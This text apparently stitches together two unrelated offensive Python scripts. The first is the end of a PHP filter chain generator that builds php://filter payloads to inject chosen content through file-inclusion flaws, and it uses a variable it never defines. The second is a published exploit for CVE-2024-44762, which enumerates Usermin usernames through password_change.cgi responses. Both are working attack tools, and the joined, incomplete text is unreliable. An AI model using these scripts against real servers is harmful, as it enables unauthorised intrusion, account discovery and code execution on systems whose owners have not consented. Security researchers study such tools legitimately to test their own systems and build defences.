'a': 'convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE',
'B': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000',
'b': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE',
'C': 'convert.iconv.UTF8.CSISO2022KR',
'c': 'convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2',
'D': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213',
'd': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5',
'E': 'convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT',
'e': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UTF16.EUC-JP-MS|convert.iconv.ISO-8859-1.ISO_6937',
'F': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB',
'f': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213',
'g': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8',
'G': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90',
'H': 'convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213',
'h': 'convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE',
'I': 'convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213',
'i': 'convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000',
'J': 'convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4',
'j': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16',
'K': 'convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE',
'k': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2',
'L': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.R9.ISO6937|convert.iconv.OSF00010100.UHC',
'l': 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE',
'M':'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4|convert.iconv.UTF16BE.866|convert.iconv.MACUKRAINIAN.WCHAR_T',
'm':'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949',
'N': 'convert.iconv.CP869.UTF-32|convert.iconv.MACUK.UCS4',
'n': 'convert.iconv.ISO88594.UTF16|convert.iconv.IBM5347.UCS4|convert.iconv.UTF32BE.MS936|convert.iconv.OSF00010004.T.61',
'O': 'convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775',
'o': 'convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE',
'P': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB',
'p': 'convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4',
'q': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.GBK.CP932|convert.iconv.BIG5.UCS2',
'Q': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2',
'R': 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4',
'r': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.ISO-IR-99.UCS-2BE|convert.iconv.L4.OSF00010101',
'S': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS',
's': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90',
'T': 'convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103',
't': 'convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS',
'U': 'convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943',
'u': 'convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61',
'V': 'convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB',
'v': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.ISO-8859-14.UCS2',
'W': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936',
'w': 'convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE',
'X': 'convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932',
'x': 'convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS',
'Y': 'convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361',
'y': 'convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT',
'Z': 'convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16',
'z': 'convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937',
'/': 'convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4',
'+': 'convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157',
'=': ''
}
def generate_filter_chain(chain, debug_base64 = False):
encoded_chain = chain
# generate some garbage base64
filters = "convert.iconv.UTF8.CSISO2022KR|"
filters += "convert.base64-encode|"
# make sure to get rid of any equal signs in both the string we just generated and the rest of the file
filters += "convert.iconv.UTF8.UTF7|"
for c in encoded_chain[::-1]:
filters += conversions[c] + "|"
# decode and reencode to get rid of everything that isn't valid base64
filters += "convert.base64-decode|"
filters += "convert.base64-encode|"
# get rid of equal signs
filters += "convert.iconv.UTF8.UTF7|"
if not debug_base64:
# don't add the decode while debugging chains
filters += "convert.base64-decode"
final_payload = f"php://filter/{filters}/resource={file_to_use}"
return final_payload
def main():
# Parsing command line arguments
parser = argparse.ArgumentParser(description="PHP filter chain generator.")
parser.add_argument("--chain", help="Content you want to generate. (you will maybe need to pad with spaces for your payload to work)", required=False)
parser.add_argument("--rawbase64", help="The base64 value you want to test, the chain will be printed as base64 by PHP, useful to debug.", required=False)
args = parser.parse_args()
if args.chain is not None:
chain = args.chain.encode('utf-8')
base64_value = base64.b64encode(chain).decode('utf-8').replace("=", "")
chain = generate_filter_chain(base64_value)
print("[+] The following gadget chain will generate the following code : {} (base64 value: {})".format(args.chain, base64_value))
print(chain)
if args.rawbase64 is not None:
rawbase64 = args.rawbase64.replace("=", "")
match = re.search("^([A-Za-z0-9+/])*$", rawbase64)
if (match):
chain = generate_filter_chain(rawbase64, True)
print(chain)
else:
print ("[-] Base64 string required.")
exit(1)
if __name__ == "__main__":
main()
# Exploit Title: Webmin Usermin 2.100 - Username Enumeration
# Date: 10.02.2024
# Exploit Author: Kjesper
# Vendor Homepage: https://www.webmin.com/usermin.html
# Software Link: https://github.com/webmin/usermin
# Version: <= 2.100
# Tested on: Kali Linux
# CVE: CVE-2024-44762
# https://senscybersecurity.nl/cve-2024-44762-explained/
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Usermin - Username Enumeration (Version 2.100)
# Usage: UserEnumUsermin.py -u HOST -w WORDLIST_USERS
# Example: UserEnumUsermin.py -u https://127.0.0.1:20000 -w users.txt
import requests
import json
import requests
import argparse
import sys
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help = "use -u with the url to the host of usermin, EX: \"-u https://127.0.0.1:20000\"")
parser.add_argument("-w", "--wordlist_users", help = "use -w with the username wordlist, EX: \"-w users.txt\"")
args = parser.parse_args()
if len(sys.argv) != 5:
print("Please provide the -u for URL and -w for the wordlist containing the usernames")
print("EX: python3 UsernameEnum.py -u https://127.0.0.1:20000 -w users.txt")
exit()
usernameFile = open(args.wordlist_users, 'r')
dataUsername = usernameFile.read()
usernameFileIntoList = dataUsername.split("\n")
usernameFile.close()
for i in usernameFileIntoList:
newHeaders = {'Content-type': 'application/x-www-form-urlencoded', 'Referer': '%s/password_change.cgi' % args.url}
params = {'user':i, 'pam':'', 'expired':'2', 'old':'fakePassword', 'new1':'password', 'new2':'password'}
response = requests.post('%s/password_change.cgi' % args.url, data=params, verify=False, headers=newHeaders)
if "Failed to change password: The current password is incorrect." in response.text:
print("Possible user found with username: " + i)
if "Failed to change password: Your login name was not found in the password file!" not in response.text and "Failed to change password: The current password is incorrect." not in response.text:
print("Application is most likely not vulnerable and are therefore quitting.")
exit() # comment out line 33-35 if you would still like to try username enumeration.